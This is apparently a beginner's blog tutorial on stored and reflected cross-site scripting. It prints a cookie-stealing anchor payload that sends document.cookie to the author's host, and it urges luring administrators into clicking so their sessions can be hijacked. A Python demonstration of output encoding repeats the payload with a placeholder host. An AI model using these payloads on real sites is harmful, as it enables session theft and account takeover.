It's been quite some time that I have been learning XSS. Now that I know a little bit of it, I decided to make tutorials for it. Keeping in mind the n00b I am at this currently, this tutorial is only for beginners.
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007.
Simply put, 'XSS', also known as 'CSS' (Cross Site Scripting, easily confused with 'Cascading Style Sheets'), is a very common vulnerability found in web applications. XSS allows the attacker to inject malicious code; the reason for that is that the developer trusts user input, or filters it incorrectly, and then sends the user input data back to the client browser, so the malicious code executes. (Courtesy: Wikipedia)
What can you do with it?
- Change settings
- Advertise Unethically
- Steal Cookies
- Steal Form Tokens to make CSRF Easier
- And more; you have to be creative to exploit XSS.
Types of XSS
- Persistent (Stored) XSS – The attack is stored on the website's server
- Non-Persistent (Reflected) XSS – The user has to go through a special link to be exposed
- DOM-based XSS – Problem exists within the client-side script
Wikipedia: A persistent cross-zone scripting vulnerability coupled with a computer worm allowed execution of arbitrary code and listing of file system contents via a QuickTime movie on MySpace.
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on “normal” pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read.
In login forms, the attacker can log in using the following code:
<a href=# onclick="document.location='http://g33kdom.net/xss.php?c='+escape(document.cookie);">Ashish</a>
So this code will show the admin of the particular site my name, 'Ashish', and when he clicks it, his session cookie will be stored on my sister site: g33kdom.net
After getting the cookie, you can do anything, which I have shown in this video.
Non-Persistent (Reflected) XSS
The non-persistent (or reflected) cross-site scripting vulnerability is by far the most common type. These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the request.
A site whose search field does not have proper input sanitizing can be used to exploit this XSS.
Sitting on the other end, at the web server, you will be receiving hits where, after a double space, is the user's cookie. You might strike lucky if an administrator clicks the link, allowing you to steal their session ID and hijack the session.
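To see why both the stored message-board case and the reflected search case come down to the same missing step, here is an added Python example (not code from the original post) that renders a stored post and a reflected search term once without and once with HTML output encoding, then parses the result the way a browser would to show which elements and event handlers actually get created. The sample post reuses the onclick/document.cookie pattern from the tutorial with the collector host replaced by the placeholder "attacker.example"; the search URLs and the render functions are constructed for this illustration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

# Constructed sample inputs (not from the original post). "attacker.example"
# is a placeholder host, not a real collector.
BENIGN_POST = "Hi all, first post here"
HOSTILE_POST = ("<a href=# onclick=\"document.location='http://attacker.example/xss.php?c='"
                "+escape(document.cookie);\">Ashish</a>")
BENIGN_SEARCH_URL = "/search?q=vintage+radio"
HOSTILE_SEARCH_URL = "/search?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E"


def render_post_unsafe(body: str) -> str:
    """Stored XSS: the message board writes the saved body straight into the page."""
    return f'<div class="post">{body}</div>'


def render_post_safe(body: str) -> str:
    """Same page with HTML output encoding: < > & " ' become entities, so the
    browser shows the text instead of creating an <a onclick=...> element."""
    return f'<div class="post">{html.escape(body, quote=True)}</div>'


def search_term(url: str) -> str:
    """Pull the q parameter out of a request URL (first value, empty if absent)."""
    params = parse_qs(urlparse(url).query)
    return params.get("q", [""])[0]


def render_search_unsafe(url: str) -> str:
    """Reflected XSS: the results page echoes the query parameter back verbatim."""
    return f"<p>Results for: {search_term(url)}</p>"


def render_search_safe(url: str) -> str:
    """Reflected page with the same output encoding applied to the echoed term."""
    return f"<p>Results for: {html.escape(search_term(url), quote=True)}</p>"


class _TagCollector(HTMLParser):
    """Records every start tag and every on* attribute the parser creates."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.handlers: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, _value in attrs:
            if name.startswith("on"):
                self.handlers.append(name)


def active_elements(fragment: str) -> tuple[list[str], list[str]]:
    """Parse a rendered fragment and return (tags created, event handlers created).
    Escaped user input shows up as text, so it contributes nothing to either list."""
    collector = _TagCollector()
    collector.feed(fragment)
    return collector.tags, collector.handlers


if __name__ == "__main__":
    for label, fragment in [
        ("stored, unsafe", render_post_unsafe(HOSTILE_POST)),
        ("stored, escaped", render_post_safe(HOSTILE_POST)),
        ("reflected, unsafe", render_search_unsafe(HOSTILE_SEARCH_URL)),
        ("reflected, escaped", render_search_safe(HOSTILE_SEARCH_URL)),
    ]:
        tags, handlers = active_elements(fragment)
        print(f"{label:>20}: tags={tags} handlers={handlers}")
```

The unsafe stored render yields a real `a` element with an `onclick` handler, and the unsafe reflected render yields a `script` element; after `html.escape` the only elements left are the template's own `div` and `p`, and the user text is displayed literally. Output encoding at the point where user data is written into HTML is the fix for both variants; marking the session cookie `HttpOnly` is a separate, complementary control that keeps `document.cookie` from exposing it even where an injection slips through.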
DOM Coming soon…